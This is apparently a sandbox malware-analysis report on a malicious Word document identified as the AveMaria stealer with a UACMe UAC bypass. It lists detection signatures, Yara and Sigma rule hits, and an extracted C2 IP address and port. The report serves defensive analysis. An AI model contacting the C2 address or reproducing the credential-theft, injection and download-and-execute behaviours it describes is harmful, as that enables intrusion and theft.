Play interactive tourEdit tour
Windows Analysis Report catalogue_2021_samples_list_revise_ol.doc
Overview
General Information
Detection
AveMaria UACMe
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (drops PE files)
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and execute file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for dropped file
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Powershell drops PE file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Increases the number of concurrent connection per server for Internet Explorer
Bypasses PowerShell execution policy
Contains functionality to hide user accounts
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Contains functionality to steal e-mail passwords
Contains functionality to steal Chrome passwords or cookies
.NET source code contains very large strings
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Found suspicious RTF objects
Contains functionality to create new users
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to enumerate running services
Sigma detected: Verclsid.exe Runs COM Object
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Sigma detected: Windows PowerShell Web Request
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Sigma detected: PowerShell Download from URL
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Classification
Process Tree |
---|
|
Malware Configuration |
---|
Threatname: AveMaria |
---|
{"C2 url": "152.67.253.163", "port": 5300}
Yara Overview |
---|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth |
| |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security | ||
Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth |
| |
JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security | ||
Click to see the 27 entries |
Unpacked PEs |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth |
| |
Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth |
| |
JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security | ||
MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth |
| |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 24 entries |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Sigma detected: PowerShell DownloadFile | Show sources |
Source: | Author: Florian Roth: |
Sigma detected: Verclsid.exe Runs COM Object | Show sources |
Source: | Author: Victor Sergeev, oscd.community: |
Sigma detected: Windows PowerShell Web Request | Show sources |
Source: | Author: James Pemberton / @4A616D6573: |
Sigma detected: PowerShell Download from URL | Show sources |
Source: | Author: Florian Roth, oscd.community, Jonhnathan Ribeiro: |
Sigma detected: Non Interactive PowerShell | Show sources |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Data Obfuscation: |
---|
Sigma detected: Powershell download and execute file | Show sources |
Source: | Author: Joe Security: |
Jbx Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: |
Found malware configuration | Show sources |
Source: | Malware Configuration Extractor: |
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Yara detected AveMaria stealer | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Multi AV Scanner detection for dropped file | Show sources |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Machine Learning detection for dropped file | Show sources |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Avira: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Exploits: |
---|
Yara detected UACMe UAC Bypass tool | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File opened: |
Source: | Directory created: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Source: | Code function: | ||
Source: | Code function: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (creates forbidden files) | Show sources |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
C2 URLs / IPs found in malware configuration | Show sources |
Source: | URLs: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |